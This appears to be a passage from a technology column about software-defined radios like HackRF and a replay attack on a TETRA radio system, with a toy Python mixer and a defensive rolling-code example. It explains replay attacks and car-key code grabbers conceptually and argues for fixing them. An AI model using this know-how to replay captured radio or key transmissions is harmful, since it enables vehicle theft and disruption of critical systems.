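The ADC-math-DAC pipeline described above can be illustrated with a toy version of the "radio math": mixing a digitized tone down to baseband entirely in software, the kind of step an SDR performs where old radios needed dedicated analog circuitry. This is a self-contained sketch, not code for any real SDR; the sample rate and carrier frequency are arbitrary.

```python
import cmath
import math

SAMPLE_RATE = 48_000   # samples per second from the (simulated) ADC
CARRIER_HZ = 12_000    # frequency of the incoming tone

# Simulated ADC output: a pure complex tone at the carrier frequency.
samples = [cmath.exp(2j * math.pi * CARRIER_HZ * n / SAMPLE_RATE)
           for n in range(1024)]

# Software mixer: multiply by a complex exponential at the tuning
# frequency to shift the carrier down to 0 Hz (baseband).
baseband = [s * cmath.exp(-2j * math.pi * CARRIER_HZ * n / SAMPLE_RATE)
            for n, s in enumerate(samples)]

# After mixing, every sample sits at the same phase: a DC signal.
print(all(abs(b - 1) < 1e-9 for b in baseband))  # True
```

Because the mixer is just arithmetic on numbers, retuning to a different frequency means changing one constant rather than swapping hardware, which is the whole point of the "nothing is fixed" property above.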
There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprising rapidity to a wide range of new friends with no sense of humor, bearing love letters that look suspiciously like arrest warrants. Think of it as speed dating, but with more guns and fewer no-thank-yous. GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it came from that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has mostly been used - and still is - in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, it can’t be banned. SDRs can’t be banned as a class, especially open source ones made of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist; that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize, and never repeat keys.
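The standard defense against replay - never accept the same authenticated message twice - can be sketched as a rolling-code scheme: the transmitter signs a monotonically increasing counter with a shared key, and the receiver refuses any counter it has already seen. The class and function names below are illustrative, not from TETRA or any car-key product.

```python
import hashlib
import hmac
import secrets

class RollingCodeReceiver:
    """Rejects replays: each message carries a counter signed with a shared
    key, and a counter at or below the last accepted one is refused."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_counter = -1

    def accept(self, counter: int, tag: bytes) -> bool:
        expected = hmac.new(self.key, counter.to_bytes(8, "big"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False   # forged or corrupted message
        if counter <= self.last_counter:
            return False   # replayed message: this counter was already used
        self.last_counter = counter
        return True

def transmit(key: bytes, counter: int) -> tuple[int, bytes]:
    """Transmitter side: send the counter plus its keyed MAC."""
    tag = hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
    return counter, tag

# Usage: a fresh message is accepted once; a captured copy is refused.
key = secrets.token_bytes(32)
receiver = RollingCodeReceiver(key)
message = transmit(key, 1)
print(receiver.accept(*message))   # True  - fresh message accepted
print(receiver.accept(*message))   # False - exact replay rejected
```

An attacker who records the transmission gains nothing: replaying it fails the counter check, and minting a new counter requires the shared key. Challenge-response protocols achieve the same property without needing the two sides to keep counters in sync.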
That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing it would be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of AliExpress for a few bucks. HackRF is to TETRA as Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them, you’d better mean it. And it won’t be cheap. ®
